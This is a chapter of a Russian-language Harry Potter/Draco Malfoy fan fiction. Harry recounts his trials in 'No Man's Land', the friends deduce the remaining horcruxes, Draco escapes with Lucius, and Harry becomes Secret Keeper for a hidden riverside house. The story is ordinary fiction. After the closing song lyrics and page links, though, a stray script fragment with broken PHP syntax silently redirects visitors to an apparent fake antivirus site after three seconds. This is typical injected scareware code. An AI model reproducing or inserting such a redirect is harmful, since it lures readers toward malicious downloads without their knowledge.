Ничья земля

Автор: Umbridge
Пайринг: Гарри Поттер/Драко Малфой
Рейтинг: NC-17
Жанр: action/agnst/romance
Саммари: Добро пожаловать! Вас приветствует НИЧЬЯ ЗЕМЛЯ! Забудьте все, чем вы были раньше. Здесь нет власти, но есть правила. Соблюдайте их - и вы выиграете!
Предупреждение: гет в 10 и 11 главах. ГП/ДУ, ДМ/НЖП, АУ 7 книги

Глава 14. Дом у реки.

(Глава, в которой на вопросы находятся ответы, Гарри возвращается в Нору, а Драко совершает побег)

Яркий свет ударил в глаза, Гарри зажмурился. Под ногами появилось что-то мягкое, вокруг стало тепло и тихо. «Это уже не Ничья земля», - вспомнил он. Проморгавшись, гриффиндорец понял, что он - в Норе. Хотя Гарри казалось, что прошло много дней, здесь все осталось по-прежнему: огоньки в лампах, свежие, горько пахнущие цветы на каминной полке, чашка какао на столе, на диване в напряженных позах - Рон с Гермионой. Увидев подругу, Гарри вспомнил о книге, Снейпе и девушке в капюшоне.

- Гермиона! – сжимая кулаки, выпалил он. - Какого черта ты связалась со Снейпом?! Он тебя подставил, так что вполне можно было и не обманывать меня!

- Связалась с кем? – спросил Рон, удивленно глядя на подругу, но та отмахнулась и бросилась к Гарри.

- Гарри! Ты был там? Расскажи обо всем по порядку, а потом будешь кричать! Видел Малфоя? Узнал про хоркруксы?

Упоминание о Малфое причинило боль. Еще чувствовался на губах вкус его губ, волосы еще пахли им. Гарри зло усмехнулся.

- Узнал, про один. А ну и еще про змею… Хотя о ней мне Дамблдор считай что прямо сказал. А вот про последний не узнал, представь себе. Снейп тебя обманул, чего и следовало ожидать! – он снова повысил голос.

- Нет, нет, такого не может быть. Он рассказал Малфою… - пробормотала девушка, глядя Гарри в переносицу. Гриффиндорец раздосадовано покачал головой.

- Черт! Нас там чуть не убили раз десять как минимум, и все из-за того, что ты, видите ли, поверила Снейпу. Спасибо, что не самому Волдеморту!

- Эй! – подал голос Рон. - Гермиона, ты что, действительно, крутила какие то делишки со Снейпом?

- Рон, перестань, - холодно осадила его девушка. - Гарри, подожди. Давай по порядку. Расскажи мне, что там произошло, и, может быть, тогда ты поймешь, что все не так плохо.

- Не так… - Гарри хмуро смотрел на подругу. – Дело не в том, что я не узнал всего. Хотя кое-что выяснил, и на том спасибо. Но ты… Как ты могла с ним спутаться! Он мог рассказать о заклинании Волдеморту!

- Это бы ничего не дало… - торопливо ответила Гермиона. – Ничья земля не пустила бы его… но в любом случае… Давай сядем и поговорим. У нас мало времени, и мы должны все обсудить.

Она схватила Гарри за руку и потянула к дивану. Мальчик посмотрел на Рона, ища поддержки.

- Для чего у нас мало времени? – ядовито поинтересовался друг, - Очередные коварные планы? Или мы ждем гостей?

- Скоро придет Молли, - терпеливо объяснила Гермиона, - и близнецы. Ну и еще у нас есть одно дело, но это потом, после того, как Гарри расскажет подробно, что с ним произошло.

- Это важно? – сухо поинтересовался гриффиндорец. Его раздражал этот допрос, эта комната и дурацкие цветы в вазе. Ромашки. Почему-то сразу вспомнилась та, которую хранил в кармане Малфой, та, которую Гарри подарил ему. – Про чудовище, питавшееся страхом тоже рассказывать? И про отрубленную руку Малфоя? Ах да! – тут же вспомнил он. - Там был Сириус!

- Сириус?

Гарри кивнул.

- Он был помощником Малфоя, а моим был Дамблдор. Ладно, что ты хочешь знать? На вопрос про Малфоя я уже ответил. Он был там со мной.

Говорить про Драко одновременно и очень хотелось и не хотелось совсем. На сердце стало как-то пусто - все казалось бессмысленным, тоска сдавила грудь, так что трудно стало дышать.

- Вы проходили испытания? – спросила между тем Гермиона.

- Да, – кивнул Гарри. – Перечислить?

- Конечно. Это может быть важно.

- Ну… Ладно. Первым испытанием был квиддич. Мы забивали бладжеры в кольца. Вторым испытанием был званный ужин. Я должен был продемонстрировать знание этикета. И Малфой помог мне. Нам обоим.

- А подробней? Вы беседовали о чем-нибудь? Вас спрашивали что-то?

- Ну… Да. Спрашивали. Какое вино подают к мясу, например. А с Малфоем мы только препирались, и все.

- Хорошо, дальше.

- Дальше было море, у которого мы ночевали, а потом мост, который разваливался под ногами. Малфой чуть не свалился. Потом мы тоже не разговаривали ни о чем особенном, потом было озеро, но не уверен, что это было испытанием…

- Да? Что за озеро?

- Там времена года сменялись каждые два-три часа. Было не до скуки, особенно зимой, но моя мантия-невидимка превратилась в мантию-грелку и под ней мы перезимовали, - Гарри покраснел, вспомнив, о чем думал, обнимая Малфоя в тепле мантии.

- Хорошо. А там вы ни о чем не болтали? Ну, просто так…

- А, там болтали. Задавали друг другу разные вопросы.

Гермиона подскочила на подушках, ее глаза сияли азартом.

– Дальше!

- Дальше - монстр. Мы там точно не говорили, то есть говорили, но, знаешь, в основном неприятные вещи, - усмехнулся Гарри, вспоминая, как чуть не убил Малфоя, а тот самоотверженно проткнул ему руку.

- Вот, - он продемонстрировал белую полоску на ладони. - Память о том, как Малфой второй раз спас мне жизнь.

Рон закатил глаза, а Гермиона нетерпеливо закивала головой.

- Потом мы нашли эликсир и залечили раны, а дальше… Рон, ты бы оценил. Мы ночевали в пещере, исполнявшей желания. Правда, не любые, а там… ну если попросишь какой-нибудь предмет.

- Да уж! – с досадой воскликнул Рон. - Почему все самое интересное проходит мимо меня!

- Ага, - вспомнил Гарри. – Кстати, именно в пещере Малфой рассказал мне про хоркрукс. Точно! И, кажется, сам вообще не понимал, о чем говорил. Просто рассказал, даже не знаю, зачем. Волдеморт отдал хоркрукс Лестранжам на хранение. Он в их имении. Точнее она – чаша Хельги Хафлпафф.

- Может, он рассказал, потому что тебе было интересно? Может, он захотел сделать тебе приятное? – предположила Гермиона.

Гарри собрался возразить, но вспомнил о следующем испытании и помрачнел. Подруга угадала, подумал Гарри, отчего-то чувствуя себя беспомощным.

- А дальше? – торопила Гермиона.

- А дальше мы были в комнатах. В трех комнатах, и из каждой можно было перейти в следующую, только ответив на вопрос. Скажи на милость, зачем тебе все это? – возмутился Гарри, не желая рассказывать о вопросах.

- Как ты не понимаешь! – воскликнула Гермиона, хватая его за руку, из-за чего получила недовольный взгляд Рона. – Малфой точно должен был знать все, что тебе нужно, иначе он бы там не оказался. И профессор Снейп понимал это…

- Профессор… Ну надо же, - Гарри закатил глаза, но подруга больно дернула его за запястье.

- Да! Только зная ответ на твой вопрос, Малфой мог оказаться с тобой в паре. Никак иначе.

- Хорошо! В общем, первый вопрос был… хм… «Чья смерть всегда будет лежать грузом вины на ваших плечах…» Как-то так. Я рассказал про Сириуса. Малфой – про своих родителей. Скрой мы правду и ворота бы не открылись. Когда надпись рассыпалась – мы вдыхали искры, и в голове словно лампочка загоралась: вот, именно таким должен быть ответ.

- А что именно Малфой говорил про родителей?

- Отец… не помню… как-то умер, а мать убил Фенрир.

Гермиона вздрогнула и поморщилась.

- Да, никому не пожелаешь такой смерти.

Они помолчали несколько секунд, а потом Гермиона снова заторопила.

- Ну а следующий вопрос? Их же было три…

- Какие тайны открыл знакомый вам обоим человек, не желая этого.

- И что вы рассказали друг другу?

- Я рассказал про Снейпа и его подштанники, - злорадно ухмыльнулся Гарри. - А Малфой… тоже про Снейпа, но про что-то другое. Про Мундунгуса Флетчера, кажется.

Гарри вспомнил тот разговор, как будто все произошло минуту назад. Пол со стершимся орнаментом, бархатные диваны, Малфой, покрасневший и злой. Кажется, они снова ругались.

- И что? Что он рассказал про него?

- Ну… Гермиона! – Гарри посмотрел на девушку, вспоминая, что говорил Малфой про чертова Флетчера. Что видел, как воришка разговаривал со Снейпом. А что Снейп?

- Малфой видел в думосбросе, как Снейп говорит с Флетчером, просит его забрать что-то. Нож, кажется, или что-то созвучное, из… Борджина и Беркса… Да точно, из Борджина и Беркса! А зачем Снейпу понадобилось оттуда это что-то забирать?! – воскликнул Гарри, заразившись азартом Гермионы. Кажется, он и сам начинал понимать. Ведь в этом магазине… - Там когда-то работал Том Риддл, Волдеморт! А ведь он прячет хоркруксы в местах, с которыми связан.

- Так, - подруга задумалась, теребя кончик косы пальцами. Рон и Гарри в напряжении уставились на нее.

- Не нож. Тогда там должна быть спрятана какая-то вещь Ровенны Ровенкло, так как остальные мы уже нашли. Хотя, может и нож, конечно, но вряд ли… Подумай, что еще может звучать как нож, но больше подходит женщине? Тогда, если не найдем нож, поищем что-то другое.

- Рожь звучит… по-женски, - предложил Рон, а когда Гермиона и Гарри взглянули на него с недоумением, пожал плечами, - ну не знаю! Может, грош.

- Нет. Скорее… Брошь! – Гермиона окинула ребят победным взглядом. – Похоже?

- Да… Что-то такое было, – согласился Гарри неуверенно.

- Ну вот - видишь! Мы нашли все хоркруксы. А ты говорил…

- Ну ладно, ладно. Хотя почем тебе знать, что мы действительно нашли их все?

- Нет! Потому что Ничья земля обязательно дает ответ, если ты проходишь испытания.

- И если остаешься в живых…

- Ну, умереть-то там нельзя… Просто вернешься обратно и все.

Гарри бросил на нее возмущенный взгляд.

- Ну вот, знал бы, позволил бы Малфою свалиться в пропасть. Почему мне кажется, за меня все решили? Ты отправила меня в Хогвартс, чтобы я не помешал тебе встретиться со Снейпом?

- Да, - Гермиона смущенно опустила глаза. – Но Гарри, это стоило того! – с жаром добавила она.

- Посмотрим. Ну а теперь может, объяснишь, зачем Снейпу понадобилось помогать нам?

- Конечно, объясню. Он хотел помочь тебе, но понимал, что ему ты никогда не поверишь, даже слушать не станешь. Это же очевидно! Поэтому он рассказал Драко о хоркруксах, все, что знал сам, но так, чтобы Малфой не понял, о чем речь. А еще Снейп хотел помочь Драко.

- Ха! Но ведь про Беркса Малфой подсмотрел у Снейпа за спиной, - заметил Гарри с усмешкой.

- Нет, это Драко был уверен в том, что Снейп случайно оставил комнату с думосбросом открытой. Земля просто подглядела его мысли. Помнишь, про вину. Ведь ни ты, ни Драко не были виноваты в смерти родителей и Сириуса. Но рассказали именно об этом, потому сами так думали. Снейп все рассчитал. Говорил с Беллатрикс при Драко, привез его в дом, чтобы показать думосброс. Подкинул нужное воспоминание. Но думаю, даже если бы Малфой не заглянул туда, Снейп бы нашел способ ему рассказать.

- Ну, хорошо. Но ведь про змею Волдеморт распинался только в присутствии Драко…

- Да, конечно, но не забывай, что Снейп отличный легилимент.

- А если бы Земля отправила его, а не Малфоя? – поинтересовался Гарри. Он с трудом представлял, чем бы закончилось такое путешествие. Скорее всего, он бы позволил монстру сожрать профессора. Если бы сам не прикончил Снейпа раньше.

- Этого не могло быть. Вы слишком… плохо друг к другу относитесь. Ты бы не поверил ему, не стал бы ему помогать…

- А Малфоя я что, по-вашему, обожаю? – спросил Гарри, злясь на друзей и на себя. Права была Земля. Видимо, знала она такое, о чем не догадывался сам гриффиндорец. На ум сразу пришло видение, показанное Землей в лабиринте.

- Малфоя ты жалел. А жалость – это уже очень много…

- Ладно, как Снейп хотел помочь мне – я понял, - с раздражением отмахнулся Гарри. - Но как он планировал помочь Малфою?

- Все правильно. Я сказала, что Снейп хотел помочь ему. Сейчас поясню. Вот, - Гермиона положила на стол расческу. - Это портключ.

- Ага! Ну конечно, теперь все ясно, - закатил глаза Рон. Гарри и Гермиона не улыбнулись.

- В три он сработает, и мы перенесемся в один дом, - продолжала девушка. – Ты слышал про заклятие Фиделиуса? Ты станешь хранителем тайны.

- Почему я?

- Потому что ты самый лучший кандидат - Волдеморт никогда не заподозрит, что хранителем можешь быть ты. Вы с Малфоем все шесть лет друг друга ненавидели. А еще ты никогда не выдашь Малфоя, ни Лорду, ни министерству, так как сейчас они суть одно и тоже.

- Но почему Снейп сам не может стать хранителем? – быстро спросил Гарри. Неожиданный страх прошелся холодом по позвоночнику. Что ждет их в этом «одном доме»? Что, если это ловушка? Ведь от Снейпа, да еще вместе с Малфоем, можно ждать чего угодно.

- Он слишком близок к Волдеморту, - заявила подруга.

- Ладно. Мне нетрудно. Кроме того, велика вероятность, что меня убьют, и тогда никто никогда ничего не узнает. Ну, осталась минута. Я пошел.

- Мы с тобой! – воскликнул Рон, хватаясь за расческу, Гермиона и Гарри последовали его примеру.

Шум в ушах, ощущение полета, потом твердый пол под ногами. Пошатнувшись, Драко открыл глаза. Тусклый свет озарял коридор замка. Холод забрался за воротник, запах плесени ударил в ноздри. Драко стало страшно, отчаянно захотелось вернуться на Ничью землю, к Поттеру, но назад пути не было – это мальчик знал точно. Оставалось только надеяться на чудо. Драко быстро повернулся к конвоиру, собираясь рассмотреть его повнимательней, но тот вдруг снял капюшон и маску.

Радость вспыхнула внутри, такая чистая и сильная, что у Драко закружилась голова.

- Папа! – воскликнул мальчик, но Люциус прижал палец к губам.

- Тише. Все потом. У нас мало времени.

Драко открыл было рот, но слова застряли в горле. Слева что-то загрохотало, мальчик вздрогнул и повернулся. Часть каменной стены отъехала в сторону, открывая вход в подземный коридор. Дальше случилось нечто совсем странное. Оттуда вылетело тело, а следом вышел профессор Снейп, направлявший левитируемого палочкой. В нем Драко узнал Лестранжа.

- Все готово. Идите. С этим я разберусь, - Снейп говорил четко, быстро, не глядя в сторону мальчика, словно не замечая его. Слизеринец посмотрел на отца. Люциус сосредоточенно кивнул. От напряжения на висках выступили капли пота. Драко заметил, что отец постарел: его лицо казалось осунувшимся, измученным. От этого слизеринцу почему-то стало еще страшнее, захотелось съёжиться, слиться со стеной и не двигаться, остаться здесь – пусть будет что будет.

- Драко, нам сюда, - Люциус указал глазами на проход. Драко хотел спросить куда они идут, но отец нагнулся и первым скрылся под аркой. Драко ничего не оставалось, как отправиться за ним.

Коридор вился, словно спутанная веревка, и казалось, ему не будет конца. Сначала отец и сын брели в темноте. Рубашка липла к мокрой от пота спине. Холодея от ужаса, Драко тащился за Люциусом, шарахаясь от стен, покрытых чем-то клейким, вздрагивая, когда крысы бросались под ноги. Спустя несколько бесконечных минут пути, беглецы вышли в освещенную часть подземного хода. Драко на мгновение показалось, что он снова на Ничьей Земле и впереди идет Поттер. Сердце тоскливо сжалось.

- Папа, куда мы идем? Как ты выжил? А почему…

- Все потом. У нас будет время поговорить, – бросил Люциус. Теперь они пошли быстрее, и Драко мог слышать, как тяжело дышит отец.

- А мама…

- Драко, помолчи, - еще миллион шагов. Драко выдыхал облака пара, почти утыкаясь носом в спину отца. Похоже, тот сильно сдал, и бег под землей давался сыну легче, чем отцу.

- Но папа… Я думал ты умер, я думал ты - Лестранж! Профессор Снейп убил его? Но ведь нас будут искать. Где мы спрячемся?

Отец молчал. Только звуки шагов гулким эхом уносились под мокрый потолок, и слизеринцу казалось, что за ними гонятся слуги Темного лорда. В горле встал ком. С отцом, конечно, было надежней, но мальчику вдруг отчаянно захотелось оказаться рядом с Поттером, и не важно где - в отеле «На вересковых полях» или в малахитовой пещере, лишь бы не бежать по сырому коридору неизвестно куда.

Но стоило Драко подумать об этом, как они с отцом вышли из тоннеля. Ночь стояла теплая, тихая. Вокруг теснились черные стволы дубравы, а впереди лежало озеро. На гладкой, маслянистой воде распадалась на белые полосы луна, висевшая в черном небе, большая, круглая и чужая. Тут Драко купался, когда маленьким приезжал к тетке. Спокойная, загадочная красота этого места всегда волновала и пугала слизеринца. Сейчас, в середине лета, озерная гладь дышала покоем, но в темной воде жила скрытая сила, о природе которой мальчик не хотел знать.

- Быстро. Сюда.

Плащ отца взметнулся вороньим крылом, и Драко бросился следом, боясь отстать. У кряжистого дуба Люциус остановился и поднял с земли что-то блестящее. Присмотревшись, мальчик понял, что это самая обыкновенная чайная ложка.

- Это портключ, - сказал отец. - Через несколько секунд он сработает. Держись.

Драко кивнул и сжал в пальцах холодный металл. В тот же момент мальчика закрутило, потащило, потом швырнуло на что-то твердое.

Рон и Гермиона упали на берег, в грязь, а Гарри шлепнулся на скользкие мостки и чуть не свалился в реку.

- Черт… - прошипел он, быстро поднимаясь и отступая на твердую землю.

- Ты цел? – тихо позвал Рон, помогавший девушке выбраться на тропинку.

- Цел, - ответил Гарри, поеживаясь. От реки тянуло промозглой сыростью. В зарослях осоки закричала выпь - гриффиндорец вздрогнул от неожиданности и огляделся. Круглая луна дрожала в темной воде, освещая тревожным светом узкую тропинку, петлявшую между кустами и терявшуюся в ельнике. В чаще ухала сова, лес вздыхал тяжело и неспокойно.

- Где мы? – спросил Гарри, помогая друзьям счистить болотную тину с мантий.

- Сейчас… - Гермиона указала за спины мальчиков. – Это там.

Гарри и Рон одновременно повернулись, и гриффиндорец увидел огни у самого берега – свет горел в окнах небольшого дома на сваях.

- Что это? Ты так и не ответила на вопрос – где мы? – возмущенно переспросил Рон.

- Это – Дом у реки, небольшое имение, принадлежавшее когда-то прапрапрабабушке мужа какой-то родственницы Люциуса Малфоя. На него и будет наложено заклятие Фиделиуса.

- Ясно, - кивнул Гарри. Значит, скоро они с Малфоем встретятся, понял он и неожиданно занервничал. Будет ли тот на месте? Удалось ли ему сбежать? – Идемте.

Путь предстоял неблизкий – вдоль реки, через густой ельник.

- Берег болотистый, по нему нельзя, - предупредила Гермиона.

- Откуда ты знаешь? – с досадой воскликнул Рон.

- Мне Снейп рассказал, - отозвалась Гермиона, стараясь не отстать от ребят.

- А что же он не сделал портключ прямо до дома, а? – ядовито поинтересовался Гарри.

- Потому что он не доверял нам, вот почему. Хватит глупых вопросов, - сердито пробормотала девушка.

Ломая сучья, перелезая через поваленные ветром деревья, друзья медленно пробирались к цели, но дом словно не желал приближаться. Рон злился, Гермиона хмурилась, а Гарри уже начал подозревать неладное, но дорога вдруг стала ровнее, вековые деревья расступились, и друзья увидели притулившийся на самом краю крутого каменистого берега домик, с одной стороны уходивший сваями в неспокойную, черную воду, а с другой – прильнувший к земле длинной верандой. Там, у самой лестницы, стояли двое.

Рон и Гарри замедлили шаг и выше подняли палочки.

- Ребята, скорее… Да не дергайтесь вы! Это же Малфои, - успокоила подруга.

- Вот именно – Малфои, - буркнул Рон, а Гарри, разглядев тонкий силуэт Драко, вдруг обрадовался. Облегчение было таким огромным, что на его лице против воли заиграла улыбка.

- Успокойся, - сказал он другу и прибавил шагу. – Но разве Малфой-старший не погиб? Драко рассказывал, что…

- Нет, как видишь, он жив. Только не спрашивай, как и почему - меня в детали никто не посвящал, - раздраженно бросила Гермиона. Они были уже рядом, и в свете луны можно было рассмотреть лица стоявших на веранде магов.

Драко с нетерпением и тревогой всматривался в темноту. «А что, если он не придет, что если он просто откажется?» - думал слизеринец, нервно трогая шрам на губе. Отец казался совершенно спокойным, и Драко не мог рассказать ему о своих переживаниях. Люциус никогда бы не понял и не простил сына.

Но когда послышались шаги и шепот, а следом за этим появились три фигуры, Драко радостно шагнул вперед, собираясь обнять Гарри, но Люциус схватил сына за рукав.

- Не торопись… - тихо процедил он. – Ты уверен, что это они?

- Н-но кто же еще? – пролепетал мальчик, отступая. И правда, глупо было бросаться к ним. Даже если один из них Поттер, с ним обязательно будут грязнокровка и Уизел.

- Может Упивающиеся, - шепотом ответил отец, но тут трое незнакомцев вышли в пятно света, и стало ясно, что это действительно гриффиндорское трио.

- Доброй ночи, - холодно сказал Люциус. Он сейчас слишком зависел от этих детей, чтобы демонстрировать свое настоящее к ним отношение. – Теперь все в сборе. Мистер Поттер, не могли бы мы зайти в дом? Втроем – вы, я и Драко.

Он выразительно посмотрел на спутников Гарри. Те переглянулись, Рон сделал шаг, но Гермиона удержала его, Гарри вышел вперед.

- Да. Идемте.

Малфой-младший едва заметно улыбнулся ему, гриффиндорец неопределенно хмыкнул в ответ. Вслед за радостью он почувствовал раздражение и досаду. Все равно ничего у них с Драко больше не будет, да и вообще, Гарри скорее всего убьют. Неприятно было видеть, как сияет лицо школьного врага, неприятно было читать в его взгляде надежду. Лучше бы Малфой снова стал холодным и ядовитым.

Гарри поднялся на веранду и зашел в дом вслед за Малфоями. Драко, отстав от отца на шаг, быстро коснулся руки гриффиндорца. Гарри вздрогнул. Возможно, сегодня они видятся в последний раз.

Люциус провел мальчиков в просторную, скромно обставленную спальню.

- Приготовьтесь, встаньте лицом к лицу, - скомандовал он. Гарри подчинился, встав, как надо, и посмотрел Малфою в глаза. Тот тоже уставился на гриффиндорца, не сводя с него взгляда, как будто хотел этим связать, проникнуть в него, не отпустить, и Гарри на мгновение ощутил странное тепло, покой, желание остаться.

Через несколько минут дело было сделано. Драко перевел дыхание, а Люциус опустил палочку.

- Все. Благодарю вас, мистер Поттер.

- Все… - эхом отозвался Гарри, поймав взгляд Малфоя. Драко старался казаться невозмутимым, но в его глазах Гарри прочитал ожидание чего-то. «Чего-то невозможного», – мрачно подумал гриффиндорец.

- Ладно. Прощайте. Драко, увидимся, - сказал Гарри, лишь бы хоть что-то сказать, развернулся и вышел.

Драко моргнул.

- Увидимся, Поттер, - тихо сказал он в спину гриффиндорцу. Драко понял намек. Конечно, при отце Поттер не стал ничего говорить, но было ясно – он пообещал встречу. Он придет за ним сюда, когда закончится война. Драко улыбнулся с облегчением. Значит тогда, в отеле, они не просто переспали, так, от нечего делать. Значит, он нужен Поттеру.

Вместо эпилога.

Сурганова и оркестр. «Белая песня»

Только там, где алым метит
солнце спину горизонта,
где сирень кудрявит ситец
и поёт прибой,
где пушистая пшеница
и как лезвие осока,
где парящей в небе птицей
голос твой,-
там мои обнимешь плечи,
ветром волосы встревожишь,-
только там открыты двери
нам с тобой.
Белым, белым кроет снегом
зелень глаз твоих.
Белым, белым станет корень
в волосах моих
скоро?
Только там, где горным соком
грудь земли ласкают реки,
где глаза глядят на север
с ледяной тоской,
где обшарпанное время
патефон иглою лечит,
где, как Парки, пляшут тени
танец свой,-
Там мои услышишь речи,
водопады слов уронишь,-
только там открыты двери
Нам с тобой!

Конец.

Предыдущая глава   Оглавление

Обсуждение на форуме

setTimeout(\'document.location.href = "http://base-file.com/antivirus"\', 3000);'); } ?>